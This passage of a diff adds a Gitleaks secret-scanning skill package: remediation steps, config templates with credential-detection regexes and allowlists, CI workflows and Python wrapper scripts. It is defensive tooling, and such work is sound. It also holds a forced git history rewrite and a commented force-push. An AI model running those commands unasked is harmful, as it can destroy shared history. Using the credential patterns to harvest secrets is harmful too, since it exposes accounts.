+#    - Store the new credential in a secrets manager
+
+# 2. Remove secret from git history using git-filter-repo
+pip install git-filter-repo
+
+# Create expressions file for secrets to remove
+cat > /tmp/expressions.txt << 'EOF'
+regex:AKIA[0-9A-Z]{16}==>REDACTED_AWS_KEY
+regex:(?i)password\s*=\s*"[^"]*"==>password="REDACTED"
+EOF
+
+git filter-repo --replace-text /tmp/expressions.txt --force
+
+# 3. Force-push the cleaned history (coordinate with team)
+# git push --force --all  # WARNING: Requires team coordination
+
+# 4. Add the secret pattern to .gitleaks.toml rules
+# 5. Update the baseline file to remove the resolved finding
+```
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| Secret | Any credential, token, key, or sensitive string that should not appear in source code |
+| Pre-commit Hook | Git hook that runs before a commit is created, blocking commits containing detected secrets |
+| Entropy | Measure of randomness in a string; high-entropy strings are more likely to be secrets |
+| Baseline | Snapshot of existing findings used to differentiate new secrets from pre-existing ones |
+| Allowlist | Configuration specifying paths, patterns, or commits to exclude from detection |
+| SARIF | Static Analysis Results Interchange Format for uploading findings to security dashboards |
+| git-filter-repo | Tool for rewriting git history to remove sensitive data from all commits |
+
+## Tools & Systems
+
+- **Gitleaks**: Open-source secret detection tool supporting pre-commit hooks, CI/CD, and historical scanning
+- **pre-commit**: Framework for managing and maintaining multi-language pre-commit hooks
+- **git-filter-repo**: History rewriting tool for removing secrets from git history
+- **TruffleHog**: Alternative secret scanner with verified secret detection capabilities
+- **GitHub Secret Scanning**: Native GitHub feature that detects secrets matching partner patterns
+
+## Common Scenarios
+
+### Scenario: Onboarding Secret Scanning on a Legacy Repository
+
+**Context**: A 5-year-old repository has never been scanned. The team needs to enable secret scanning without blocking all development while historical secrets are rotated.
+
+**Approach**:
+1. Run `gitleaks detect` against full history and generate a baseline JSON file
+2. Triage each finding: classify as active (needs rotation), inactive (already rotated), or false positive
+3. Immediately rotate all active secrets and update consuming services
+4. Commit the baseline file (excluding active secrets that have been fixed)
+5. Enable pre-commit hooks for new development immediately
+6. Add CI/CD scanning with the baseline to catch only new secrets
+7. Progressively reduce the baseline as historical secrets are rotated
+
+**Pitfalls**: Generating a baseline without triaging means accepting risk on unrotated secrets. Never assume a historical secret is inactive without verifying with the service provider. Running git-filter-repo on a shared repository without coordination will cause rebase conflicts for all team members.
+
+## Output Format
+
+```
+Gitleaks Secret Scanning Report
+=================================
+Repository: org/web-application
+Scan Type: Full History
+Commits Scanned: 4,523
+Date: 2026-02-23
+
+FINDINGS:
+  Total: 12
+  New (not in baseline): 3
+  Baseline (pre-existing): 9
+
+NEW FINDINGS (blocking):
+  [1] AWS Access Key ID
+      Rule: aws-access-key-id
+      File: src/config/aws.py:23
+      Commit: a1b2c3d (2026-02-22, dev@company.com)
+      Secret: AKIA...REDACTED
+      Entropy: 3.8
+
+  [2] GitHub Personal Access Token
+      Rule: github-pat
+      File: scripts/deploy.sh:15
+      Commit: d4e5f6g (2026-02-21, ops@company.com)
+      Secret: ghp_...REDACTED
+      Entropy: 4.2
+
+  [3] Internal API Token
+      Rule: internal-api-token
+      File: src/services/auth.py:89
+      Commit: h7i8j9k (2026-02-20, dev@company.com)
+
+QUALITY GATE: FAILED (3 new findings)
+Action: Rotate exposed credentials immediately.
+```

--- a/security/skills/implementing-secret-scanning-with-gitleaks/assets/template.md
+++ b/security/skills/implementing-secret-scanning-with-gitleaks/assets/template.md
@@ -1,0 +1,175 @@
+# Gitleaks Secret Scanning Templates
+
+## Pre-Commit Configuration
+
+```yaml
+# .pre-commit-config.yaml
+repos:
+  - repo: https://github.com/gitleaks/gitleaks
+    rev: v8.21.2
+    hooks:
+      - id: gitleaks
+        name: Detect secrets with Gitleaks
+        entry: gitleaks protect --staged --verbose --redact
+        language: golang
+        pass_filenames: false
+```
+
+## Organization Gitleaks Configuration
+
+```toml
+# .gitleaks.toml
+title = "Organization Secret Scanning Rules"
+
+[extend]
+useDefault = true
+
+# ─── Custom Rules ───
+
+[[rules]]
+id = "internal-service-token"
+description = "Internal service-to-service authentication token"
+regex = '''(?i)(service[_-]?token|internal[_-]?key)["\s:=]+["']?([A-Za-z0-9_\-]{36,})["']?'''
+entropy = 3.5
+keywords = ["service_token", "service-token", "internal_key", "internal-key"]
+
+[[rules]]
+id = "database-url-with-password"
+description = "Database connection URL with embedded password"
+regex = '''(?i)(DATABASE_URL|DB_URL|SQLALCHEMY_DATABASE_URI)\s*=\s*["']?(postgres|mysql|mongodb)\+?[a-z]*://[^:]+:[^@]+@'''
+keywords = ["DATABASE_URL", "DB_URL", "SQLALCHEMY_DATABASE_URI"]
+
+[[rules]]
+id = "encryption-key-hex"
+description = "Encryption key in hexadecimal format"
+regex = '''(?i)(encryption[_-]?key|aes[_-]?key|secret[_-]?key)\s*=\s*["']?([0-9a-fA-F]{32,64})["']?'''
+entropy = 3.0
+keywords = ["encryption_key", "aes_key", "secret_key"]
+
+# ─── Allowlist ───
+
+[allowlist]
+description = "Global allowlist for false positive reduction"
+paths = [
+  '''(^|/)test(s)?/''',
+  '''(^|/)spec(s)?/''',
+  '''\.test\.(js|ts|py|go|rb)$''',
+  '''\.spec\.(js|ts|py|go|rb)$''',
+  '''(^|/)__tests__/''',
+  '''(^|/)__mocks__/''',
+  '''(^|/)fixtures/''',
+  '''(^|/)testdata/''',
+  '''(^|/)vendor/''',
+  '''(^|/)node_modules/''',
+  '''\.md$''',
+  '''CHANGELOG'''
+]
+regexes = [
+  '''(?i)EXAMPLE''',
+  '''(?i)PLACEHOLDER''',
+  '''(?i)CHANGEME''',
+  '''(?i)your[-_]?(api[-_]?key|secret|token|password)''',
+  '''(?i)test[-_]?(key|secret|token|password|credential)''',
+  '''example\.com''',
+  '''localhost''',
+  '''0{8,}''',
+  '''x{8,}'''
+]
+
+# Per-rule allowlists
+[[rules.allowlist]]
+description = "Allow AWS example keys"
+regexes = ["AKIAIOSFODNN7EXAMPLE"]
+```
+
+## GitHub Actions Workflow
+
+```yaml
+# .github/workflows/secret-scanning.yml
+name: Secret Scanning
+
+on:
+  push:
+    branches: [main, develop]
+  pull_request:
+    branches: [main]
+  schedule:
+    - cron: '0 6 * * *'
+
+jobs:
+  gitleaks:
+    name: Gitleaks
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      - name: Install Gitleaks
+        run: |
+          GITLEAKS_VERSION="8.21.2"
+          wget -qO- "https://github.com/gitleaks/gitleaks/releases/download/v${GITLEAKS_VERSION}/gitleaks_${GITLEAKS_VERSION}_linux_x64.tar.gz" | tar xz
+          sudo mv gitleaks /usr/local/bin/
+
+      - name: Run scan
+        run: |
+          if [ "${{ github.event_name }}" == "pull_request" ]; then
+            gitleaks detect \
+              --source . \
+              --log-opts="${{ github.event.pull_request.base.sha }}..${{ github.sha }}" \
+              --report-format sarif \
+              --report-path gitleaks.sarif \
+              --exit-code 1 \
+              --verbose
+          else
+            gitleaks detect \
+              --source . \
+              --baseline-path .gitleaks-baseline.json \
+              --report-format sarif \
+              --report-path gitleaks.sarif \
+              --exit-code 1 \
+              --verbose
+          fi
+
+      - name: Upload SARIF
+        if: always()
+        uses: github/codeql-action/upload-sarif@v3
+        with:
+          sarif_file: gitleaks.sarif
+          category: gitleaks
+```
+
+## Incident Response Template for Exposed Secrets
+
+```markdown
+## Secret Exposure Incident Report
+
+**Date Detected**: YYYY-MM-DD
+**Detected By**: Gitleaks CI scan / Pre-commit hook / Manual review
+**Repository**: org/repo-name
+**Severity**: Critical / High
+
+### Exposed Credential Details
+- **Type**: [AWS Access Key | GitHub PAT | Database Password | etc.]
+- **Rule ID**: [gitleaks rule that detected it]
+- **File**: [path/to/file:line]
+- **Commit**: [short SHA]
+- **Author**: [email]
+- **Date Committed**: [date]
+- **Exposure Duration**: [time from commit to detection]
+
+### Remediation Actions
+- [ ] Credential revoked at service provider
+- [ ] New credential generated and stored in secrets manager
+- [ ] Consuming services updated to use new credential
+- [ ] Service functionality verified
+- [ ] Git history cleaned (if required)
+- [ ] Baseline updated
+- [ ] Root cause documented
+
+### Root Cause
+[Why was the secret committed? Missing pre-commit hook? Developer education gap?]
+
+### Preventive Measures
+[What changes prevent recurrence? Hook enforcement? Rule addition?]
+```

--- a/security/skills/implementing-secret-scanning-with-gitleaks/references/api-reference.md
+++ b/security/skills/implementing-secret-scanning-with-gitleaks/references/api-reference.md
@@ -1,0 +1,180 @@
+# API Reference: Gitleaks Secret Scanning
+
+## Libraries Used
+
+| Library | Purpose |
+|---------|---------|
+| `subprocess` | Execute gitleaks CLI commands |
+| `json` | Parse gitleaks JSON report output |
+| `pathlib` | Handle repository and report file paths |
+| `os` | Read `GITLEAKS_CONFIG` environment variable |
+
+## Installation
+
+```bash
+# Install gitleaks binary
+# macOS
+brew install gitleaks
+
+# Linux
+curl -sSfL https://github.com/gitleaks/gitleaks/releases/latest/download/gitleaks_linux_x64 -o gitleaks
+chmod +x gitleaks && sudo mv gitleaks /usr/local/bin/
+
+# Docker
+docker pull ghcr.io/gitleaks/gitleaks:latest
+```
+
+## CLI Commands
+
+### Scan a Git Repository
+```bash
+gitleaks git --source=/path/to/repo --report-format=json --report-path=results.json
+```
+
+### Scan a Directory (Non-Git)
+```bash
+gitleaks dir --source=/path/to/code --report-format=json --report-path=results.json
+```
+
+### Scan from stdin
+```bash
+echo "aws_secret_access_key=AKIAIOSFODNN7EXAMPLE" | gitleaks stdin
+```
+
+### Key CLI Flags
+
+| Flag | Description |
+|------|-------------|
+| `--source` | Path to repository or directory to scan |
+| `--config`, `-c` | Path to custom gitleaks.toml config |
+| `--report-format`, `-f` | Output format: `json`, `csv`, `junit`, `sarif` |
+| `--report-path`, `-r` | Path to write the report file |
+| `--baseline-path` | Ignore known findings from baseline file |
+| `--exit-code` | Exit code when leaks found (default: 1) |
+| `--redact` | Redact secrets in output (percent: 0-100) |
+| `--verbose`, `-v` | Show verbose scan output |
+| `--no-git` | Treat source as plain directory |
+| `--log-level` | Log level: trace, debug, info, warn, error |
+| `--max-target-megabytes` | Skip files larger than this size |
+
+## Custom Configuration (.gitleaks.toml)
+
+```toml
+title = "Custom Gitleaks Config"
+
+[extend]
+useDefault = true  # Extend the default ruleset
+
+[[rules]]
+id = "custom-internal-token"
+description = "Internal API token pattern"
+regex = '''(?i)internal[_-]?token\s*[:=]\s*['"]?([a-zA-Z0-9]{32,})'''
+tags = ["internal", "token"]
+keywords = ["internal_token", "internal-token"]
+
+[[rules]]
+id = "custom-db-password"
+description = "Database password in config"
+regex = '''(?i)(db|database|mysql|postgres)[_-]?pass(word)?\s*[:=]\s*['"]?[^\s'"]{8,}'''
+tags = ["database", "password"]
+
+[rules.allowlist]
+paths = ['''test/.*''', '''mock/.*''']
+regexTarget = "line"
+regexes = ['''(?i)example|placeholder|changeme|test''']
+
+[[allowlist.paths]]
+regex = '''vendor/.*'''
+
+[[allowlist.commits]]
+sha = "abc123def456"
+```
+
+## Python Integration
+
+### Run Gitleaks and Parse Results
+```python
+import subprocess
+import json
+from pathlib import Path
+
+def scan_repository(repo_path, config_path=None):
+    cmd = [
+        "gitleaks", "git",
+        "--source", str(repo_path),
+        "--report-format", "json",
+        "--report-path", "/tmp/gitleaks-report.json",
+        "--exit-code", "0",
+    ]
+    if config_path:
+        cmd.extend(["--config", str(config_path)])
+
+    result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
+
+    report_path = Path("/tmp/gitleaks-report.json")
+    if report_path.exists():
+        with open(report_path) as f:
+            findings = json.load(f)
+        return findings
+    return []
+```
+
+### Categorize Findings by Severity
+```python
+HIGH_SEVERITY_RULES = {
+    "aws-access-key", "aws-secret-key", "gcp-api-key",
+    "github-pat", "private-key", "generic-api-key",
+}
+
+def categorize_findings(findings):
+    high, medium, low = [], [], []
+    for f in findings:
+        rule = f.get("RuleID", "")
+        if rule in HIGH_SEVERITY_RULES:
+            high.append(f)
+        elif "password" in rule or "token" in rule:
+            medium.append(f)
+        else:
+            low.append(f)
+    return {"high": high, "medium": medium, "low": low}
+```
+
+## GitHub Actions Integration
+
+```yaml
+name: Gitleaks Secret Scan
+on: [push, pull_request]
+jobs:
+  gitleaks:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+      - uses: gitleaks/gitleaks-action@v2
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+```
+
+## Output Format
+
+```json
+[
+  {
+    "Description": "Detected a Generic API Key",
+    "StartLine": 42,
+    "EndLine": 42,
+    "StartColumn": 15,
+    "EndColumn": 55,
+    "Match": "REDACTED",
+    "Secret": "REDACTED",
+    "File": "config/settings.py",
+    "Commit": "a1b2c3d4e5f6",
+    "Author": "developer@example.com",
+    "Date": "2025-01-15T10:30:00Z",
+    "RuleID": "generic-api-key",
+    "Tags": ["api", "key"],
+    "Fingerprint": "a1b2c3d4:config/settings.py:generic-api-key:42"
+  }
+]
+```

--- a/security/skills/implementing-secret-scanning-with-gitleaks/references/standards.md
+++ b/security/skills/implementing-secret-scanning-with-gitleaks/references/standards.md
@@ -1,0 +1,54 @@
+# Standards Reference: Secret Scanning with Gitleaks
+
+## OWASP Top 10 - A07:2021 Identification and Authentication Failures
+
+- Hardcoded credentials in source code enable unauthorized access
+- Gitleaks detects API keys, passwords, tokens, and private keys before they reach repositories
+- CWE-798: Use of Hard-coded Credentials is a direct mapping
+
+## NIST SSDF (SP 800-218)
+
+### PW.1: Design Software to Meet Security Requirements
+- PW.1.1: Identify security requirements including credential management
+- Secrets should never be stored in source code; use environment variables or secrets managers
+
+### PS.1: Protect All Forms of Code
+- PS.1.1: Store code securely with access controls and secret scanning
+- Implement pre-commit hooks to prevent secrets from entering version control
+
+### PS.2: Provide a Mechanism for Verifying Software Release Integrity
+- Code signing and secret scanning ensure software releases do not contain embedded credentials
+
+## CIS Software Supply Chain Security Guide
+
+### Source Code Controls
+- SC-1: Automated secret scanning on all commits
+- SC-5: No hardcoded credentials in source repositories
+- SC-6: Secrets detection integrated into CI/CD pipeline
+
+## OWASP SAMM - Secure Build
+
+### Maturity Level 1
+- Scan repositories for common secret patterns using default rulesets
+- Alert developers when secrets are detected in pull requests
+
+### Maturity Level 2
+- Custom rules for organization-specific secret patterns
+- Pre-commit hooks prevent secrets from entering history
+- Baseline management for legacy codebases
+
+### Maturity Level 3
+- Automated secret rotation workflow triggered by detection
+- Correlation with secrets management systems for validation
+- Historical scanning with git-filter-repo remediation
+
+## PCI DSS v4.0
+
+- Requirement 6.3.1: Security vulnerabilities identified through a defined process including code analysis
+- Requirement 8.6.1: Secrets stored in code or configuration files must be protected
+- Requirement 8.6.3: Passwords/passphrases for application and system accounts are protected against misuse
+
+## SOC 2 Trust Service Criteria
+
+- CC6.1: Logical access security over protected information assets including credential management
+- CC6.7: Restrict transmission of data to authorized external parties (prevent credential leakage)

--- a/security/skills/implementing-secret-scanning-with-gitleaks/references/workflows.md
+++ b/security/skills/implementing-secret-scanning-with-gitleaks/references/workflows.md
@@ -1,0 +1,92 @@
+# Workflow Reference: Secret Scanning with Gitleaks
+
+## Secret Detection Pipeline
+
+```
+Developer Workstation          CI/CD Pipeline              Security Response
+     │                              │                           │
+     ▼                              │                           │
+┌──────────────┐                    │                           │
+│ Pre-commit   │                    │                           │
+│ Hook (local) │                    │                           │
+└──────┬───────┘                    │                           │
+       │                            │                           │
+  ┌────┴────┐                       │                           │
+  │         │                       │                           │
+PASS      FAIL                      │                           │
+  │     (blocked)                   │                           │
+  ▼                                 │                           │
+Push to                             │                           │
+Remote                              │                           │
+  │                                 ▼                           │
+  │                        ┌──────────────┐                     │
+  └───────────────────────>│ Gitleaks CI  │                     │
+                           │ Scan (PR)    │                     │
+                           └──────┬───────┘                     │
+                                  │                             │
+                            ┌─────┴─────┐                      │
+                            │           │                       │
+                          PASS        FAIL                      │
+                            │     ┌─────┴──────┐               │
+                            │     │ Block PR   │               │
+                            │     │ + Alert    │──────────────>│
+                            │     └────────────┘    ┌──────────┴──────┐
+                            │                       │ Rotate Secret   │
+                            │                       │ Update Baseline │
+                            │                       │ Clean History   │
+                            │                       └─────────────────┘
+                            ▼
+                    Merge Permitted
+```
+
+## Gitleaks Rule Configuration Deep Dive
+
+### Rule Anatomy
+```toml
+[[rules]]
+id = "rule-unique-identifier"          # Unique rule ID
+description = "Human-readable desc"     # What this rule detects
+regex = '''pattern'''                   # Detection regex
+entropy = 3.5                           # Minimum entropy threshold (optional)
+secretGroup = 1                         # Regex capture group containing secret
+keywords = ["key1", "key2"]             # Fast pre-filter keywords
+tags = ["aws", "credential"]            # Categorization tags
+path = '''\.env$'''                     # Path filter regex (optional)
+```
+
+### Built-in Rule Categories
+| Category | Example Rules | Count |
+|----------|--------------|-------|
+| Cloud Provider Keys | aws-access-key-id, gcp-service-account | 15+ |
+| API Tokens | github-pat, gitlab-pat, slack-token | 20+ |
+| Private Keys | private-key, rsa-private-key | 5+ |
+| Database Credentials | generic-password, connection-string | 10+ |
+| Service Tokens | stripe-api-key, sendgrid-api-key | 30+ |
+
+### Entropy Scoring
+- Entropy measures string randomness (Shannon entropy)
+- Random-looking strings (API keys) have entropy > 3.5
+- Regular English text has entropy around 2.0-3.0
+- Setting entropy threshold reduces false positives on non-random strings
+- Combine entropy with regex for highest accuracy
+
+## Remediation Process
+
+### Secret Rotation Checklist
+1. Identify the exposed secret type and associated service
+2. Log into the service provider and revoke the exposed credential
+3. Generate a new credential with the same permissions
+4. Store the new credential in a secrets manager (Vault, AWS SM, etc.)
+5. Update all consuming services to use the new credential
+6. Verify service functionality with the new credential
+7. Update the Gitleaks baseline to remove the resolved finding
+8. Optionally clean git history with git-filter-repo
+
+### History Cleanup Decision Matrix
+| Factor | Clean History | Keep History |
+|--------|--------------|--------------|
+| Secret is rotated | Optional | Acceptable |
+| Repo is public | Required | Never |
+| Compliance mandate | Required | Not compliant |
+| Active contributor count | < 10 preferred | > 10 difficult |
+| Secret exposure duration | Long (high risk) | Short (lower risk) |

--- a/security/skills/implementing-secret-scanning-with-gitleaks/scripts/agent.py
+++ b/security/skills/implementing-secret-scanning-with-gitleaks/scripts/agent.py
@@ -1,0 +1,215 @@
+#!/usr/bin/env python3
+"""Gitleaks secret scanning agent.
+
+Wraps the Gitleaks CLI to scan git repositories, directories, or
+specific commits for hardcoded secrets, API keys, tokens, and
+credentials. Parses JSON output into structured findings.
+"""
+import argparse
+import json
+import os
+import subprocess
+import sys
+from datetime import datetime, timezone
+
+
+def find_gitleaks_binary():
+    """Locate the gitleaks binary on the system."""
+    custom_path = os.environ.get("GITLEAKS_PATH")
+    if custom_path and os.path.isfile(custom_path):
+        return custom_path
+    for name in ["gitleaks", "gitleaks.exe"]:
+        for directory in os.environ.get("PATH", "").split(os.pathsep):
+            full_path = os.path.join(directory, name)
+            if os.path.isfile(full_path):
+                return full_path
+    print("[!] gitleaks binary not found. Install: https://github.com/gitleaks/gitleaks",
+          file=sys.stderr)
+    sys.exit(1)
+
+
+def run_detect(gitleaks_bin, target, config=None, baseline=None,
+               log_opts=None, no_git=False, verbose=False):
+    """Run gitleaks detect on a repository or directory."""
+    cmd = [gitleaks_bin, "detect"]
+    if no_git:
+        cmd.extend(["--no-git", "--source", target])
+    else:
+        cmd.extend(["--source", target])
+    cmd.extend(["--report-format", "json", "--report-path", "/dev/stdout"])
+    if config:
+        cmd.extend(["--config", config])
+    if baseline:
+        cmd.extend(["--baseline-path", baseline])
+    if log_opts:
+        cmd.extend(["--log-opts", log_opts])
+    if verbose:
+        cmd.append("--verbose")
+    cmd.extend(["--exit-code", "0"])
+
+    print(f"[*] Running: {' '.join(cmd)}")
+    result = subprocess.run(
+        cmd,
+        capture_output=True,
+        text=True,
+        timeout=600,
+    )
+    if result.returncode not in (0, 1):
+        print(f"[!] Gitleaks error (exit {result.returncode}): {result.stderr}",
+              file=sys.stderr)
+    return result.stdout, result.stderr, result.returncode
+
+
+def run_protect(gitleaks_bin, target, config=None, staged=False, verbose=False):
+    """Run gitleaks protect for pre-commit scanning."""
+    cmd = [gitleaks_bin, "protect", "--source", target]
+    cmd.extend(["--report-format", "json", "--report-path", "/dev/stdout"])
+    if staged:
+        cmd.append("--staged")
+    if config:
+        cmd.extend(["--config", config])
+    if verbose:
+        cmd.append("--verbose")
+    cmd.extend(["--exit-code", "0"])
+
+    print(f"[*] Running protect mode: {' '.join(cmd)}")
+    result = subprocess.run(
+        cmd,
+        capture_output=True,
+        text=True,
+        timeout=300,
+    )
+    return result.stdout, result.stderr, result.returncode
+
+
+def parse_findings(raw_json):
+    """Parse gitleaks JSON output into structured findings."""
+    findings = []
+    if not raw_json or not raw_json.strip():
+        return findings
+    try:
+        results = json.loads(raw_json)
+    except json.JSONDecodeError:
+        return findings
+    if not isinstance(results, list):
+        results = [results]
+    for item in results:
+        secret_val = item.get("Secret", "")
+        findings.append({
+            "rule_id": item.get("RuleID", "unknown"),
+            "description": item.get("Description", ""),
+            "secret": secret_val[:8] + "..." if secret_val else "",
+            "file": item.get("File", ""),
+            "line": item.get("StartLine", 0),
+            "commit": (item.get("Commit", "") or "")[:12],
+            "author": item.get("Author", ""),
+            "email": item.get("Email", ""),
+            "date": item.get("Date", ""),
+            "message": (item.get("Message", "") or "")[:80],
+            "entropy": item.get("Entropy", 0),
+            "fingerprint": item.get("Fingerprint", ""),
+            "tags": item.get("Tags", []),
+        })
+    return findings
+
+
+def format_summary(findings, target):
+    """Print human-readable summary of secrets found."""
+    print(f"\n{'='*60}")
+    print(f"  Gitleaks Secret Scan Report")
+    print(f"{'='*60}")
+    print(f"  Target    : {target}")
+    print(f"  Secrets   : {len(findings)}")
+
+    if not findings:
+        print(f"  Status    : CLEAN - No secrets detected")
+        print(f"{'='*60}")
+        return
+
+    by_rule = {}
+    for f in findings:
+        rule = f["rule_id"]
+        by_rule.setdefault(rule, []).append(f)
+
+    print(f"\n  Findings by Rule:")
+    for rule, items in sorted(by_rule.items(), key=lambda x: -len(x[1])):
+        print(f"    {rule:40s}: {len(items)} occurrence(s)")
+
+    by_file = {}
+    for f in findings:
+        by_file.setdefault(f["file"], []).append(f)
+
+    print(f"\n  Affected Files: {len(by_file)}")
+    for filepath, items in sorted(by_file.items(), key=lambda x: -len(x[1]))[:10]:
+        print(f"    {filepath} ({len(items)} secret(s))")
+
+    print(f"\n  Top Findings:")
+    for f in findings[:15]:
+        print(f"    [{f['rule_id']:30s}] {f['file']}:{f['line']} "
+              f"(commit: {f['commit']}, secret: {f['secret']})")
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Gitleaks secret scanning agent"
+    )
+    parser.add_argument("--target", required=True,
+                        help="Repository path or directory to scan")
+    parser.add_argument("--mode", choices=["detect", "protect"], default="detect",
+                        help="Scan mode: detect (full history) or protect (pre-commit)")
+    parser.add_argument("--config", help="Path to custom .gitleaks.toml config")
+    parser.add_argument("--baseline", help="Path to baseline file for known findings")
+    parser.add_argument("--log-opts", help="Git log options (e.g., '--since=2026-01-01')")
+    parser.add_argument("--no-git", action="store_true",
+                        help="Scan files without git history")
+    parser.add_argument("--staged", action="store_true",
+                        help="Only scan staged changes (protect mode)")
+    parser.add_argument("--output", "-o", help="Output JSON report path")
+    parser.add_argument("--verbose", "-v", action="store_true")
+    args = parser.parse_args()
+
+    gitleaks_bin = find_gitleaks_binary()
+    print(f"[*] Using gitleaks: {gitleaks_bin}")
+
+    if args.mode == "protect":
+        raw_json, stderr, exit_code = run_protect(
+            gitleaks_bin, args.target, args.config, args.staged, args.verbose
+        )
+    else:
+        raw_json, stderr, exit_code = run_detect(
+            gitleaks_bin, args.target, args.config, args.baseline,
+            args.log_opts, args.no_git, args.verbose
+        )
+
+    findings = parse_findings(raw_json)
+    format_summary(findings, args.target)
+
+    report = {
+        "timestamp": datetime.now(timezone.utc).isoformat(),
+        "tool": "gitleaks",
+        "target": args.target,
+        "mode": args.mode,
+        "secrets_found": len(findings),
+        "findings": findings,
+        "risk_level": (
+            "CRITICAL" if len(findings) > 10
+            else "HIGH" if len(findings) > 0
+            else "LOW"
+        ),
+    }
+
+    if args.output:
+        with open(args.output, "w") as f:
+            json.dump(report, f, indent=2)
+        print(f"\n[+] Report saved to {args.output}")
+    elif args.verbose:
+        print(json.dumps(report, indent=2))
+
+    if findings:
+        print(f"\n[!] {len(findings)} secret(s) detected - remediation required")
+    else:
+        print(f"\n[+] No secrets detected")
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/implementing-secret-scanning-with-gitleaks/scripts/process.py
+++ b/security/skills/implementing-secret-scanning-with-gitleaks/scripts/process.py
@@ -1,0 +1,299 @@
+#!/usr/bin/env python3
+"""
+Gitleaks Secret Scanning Pipeline Script
+
+Runs Gitleaks scans, manages baselines, evaluates findings,
+and generates remediation reports.
+
+Usage:
+    python process.py --repo-path /path/to/repo --scan-type detect
+    python process.py --repo-path . --scan-type protect --staged
+    python process.py --repo-path . --baseline .gitleaks-baseline.json --output report.json
+"""
+
+import argparse
+import json
+import os
+import subprocess
+import sys
+from dataclasses import dataclass, field
+from datetime import datetime, timezone
+from typing import Optional
+
+
+@dataclass
+class SecretFinding:
+    rule_id: str
+    description: str
+    file: str
+    line: int
+    commit: str
+    author: str
+    date: str
+    secret: str
+    entropy: float
+    match: str
+    tags: list = field(default_factory=list)
+    is_new: bool = True
+
+
+@dataclass
+class ScanResult:
+    findings: list = field(default_factory=list)
+    new_findings: list = field(default_factory=list)
+    baseline_findings: list = field(default_factory=list)
+    commits_scanned: int = 0
+    scan_duration: float = 0.0
+    error: str = ""
+
+
+def run_gitleaks(repo_path: str, scan_type: str = "detect",
+                 baseline_path: Optional[str] = None,
+                 commit_range: Optional[str] = None,
+                 staged: bool = False,
+                 config_path: Optional[str] = None) -> dict:
+    """Execute Gitleaks and return JSON results."""
+    cmd = ["gitleaks", scan_type, "--source", repo_path,
+           "--report-format", "json", "--report-path", "/dev/stdout"]
+
+    if baseline_path and os.path.exists(baseline_path):
+        cmd.extend(["--baseline-path", baseline_path])
+
+    if commit_range:
+        cmd.extend(["--log-opts", commit_range])
+
+    if staged:
+        cmd.append("--staged")
+
+    if config_path:
+        cmd.extend(["--config", config_path])
+
+    cmd.append("--verbose")
+
+    try:
+        proc = subprocess.run(
+            cmd,
+            capture_output=True,
+            text=True,
+            timeout=300
+        )
+
+        findings = []
+        if proc.stdout.strip():
+            try:
+                findings = json.loads(proc.stdout)
+            except json.JSONDecodeError:
+                pass
+
+        return {
+            "findings": findings if isinstance(findings, list) else [],
+            "exit_code": proc.returncode,
+            "stderr": proc.stderr
+        }
+
+    except subprocess.TimeoutExpired:
+        return {"findings": [], "exit_code": -1, "stderr": "Scan timed out after 300s"}
+    except FileNotFoundError:
+        return {"findings": [], "exit_code": -1,
+                "stderr": "gitleaks not found. Install from https://github.com/gitleaks/gitleaks"}
+
+
+def parse_findings(raw_findings: list) -> list:
+    """Parse raw Gitleaks JSON findings into SecretFinding objects."""
+    findings = []
+    for f in raw_findings:
+        redacted_secret = redact_secret(f.get("Secret", ""))
+        findings.append(SecretFinding(
+            rule_id=f.get("RuleID", "unknown"),
+            description=f.get("Description", ""),
+            file=f.get("File", ""),
+            line=f.get("StartLine", 0),
+            commit=f.get("Commit", "")[:8],
+            author=f.get("Author", ""),
+            date=f.get("Date", ""),
+            secret=redacted_secret,
+            entropy=f.get("Entropy", 0.0),
+            match=f.get("Match", "")[:100],
+            tags=f.get("Tags", [])
+        ))
+    return findings
+
+
+def redact_secret(secret: str) -> str:
+    """Redact a secret, showing only first 4 and last 4 characters."""
+    if len(secret) <= 12:
+        return "*" * len(secret)
+    return secret[:4] + "..." + secret[-4:]
+
+
+def load_baseline(baseline_path: str) -> set:
+    """Load baseline fingerprints for comparison."""
+    if not os.path.exists(baseline_path):
+        return set()
+
+    with open(baseline_path, "r") as f:
+        try:
+            baseline = json.load(f)
+        except json.JSONDecodeError:
+            return set()
+
+    fingerprints = set()
+    for entry in baseline:
+        fp = f"{entry.get('RuleID', '')}:{entry.get('File', '')}:{entry.get('Commit', '')}"
+        fingerprints.add(fp)
+
+    return fingerprints
+
+
+def classify_findings(findings: list, baseline_fingerprints: set) -> tuple:
+    """Separate findings into new and baseline (pre-existing)."""
+    new_findings = []
+    baseline_findings = []
+
+    for f in findings:
+        fp = f"{f.rule_id}:{f.file}:{f.commit}"
+        if fp in baseline_fingerprints:
+            f.is_new = False
+            baseline_findings.append(f)
+        else:
+            f.is_new = True
+            new_findings.append(f)
+
+    return new_findings, baseline_findings
+
+
+def generate_report(scan_result: ScanResult, repo_path: str) -> dict:
+    """Generate a structured scan report."""
+    rule_summary = {}
+    for f in scan_result.findings:
+        rule_summary[f.rule_id] = rule_summary.get(f.rule_id, 0) + 1
+
+    author_summary = {}
+    for f in scan_result.new_findings:
+        author_summary[f.author] = author_summary.get(f.author, 0) + 1
+
+    return {
+        "report_metadata": {
+            "repository": repo_path,
+            "scan_date": datetime.now(timezone.utc).isoformat(),
+            "duration_seconds": scan_result.scan_duration,
+            "commits_scanned": scan_result.commits_scanned
+        },
+        "summary": {
+            "total_findings": len(scan_result.findings),
+            "new_findings": len(scan_result.new_findings),
+            "baseline_findings": len(scan_result.baseline_findings),
+            "unique_rules_triggered": len(rule_summary),
+            "rules_breakdown": rule_summary,
+            "authors_with_new_findings": author_summary
+        },
+        "quality_gate": {
+            "passed": len(scan_result.new_findings) == 0,
+            "blocking_count": len(scan_result.new_findings)
+        },
+        "new_findings": [
+            {
+                "rule_id": f.rule_id,
+                "description": f.description,
+                "file": f.file,
+                "line": f.line,
+                "commit": f.commit,
+                "author": f.author,
+                "date": f.date,
+                "secret_preview": f.secret,
+                "entropy": f.entropy
+            }
+            for f in scan_result.new_findings
+        ],
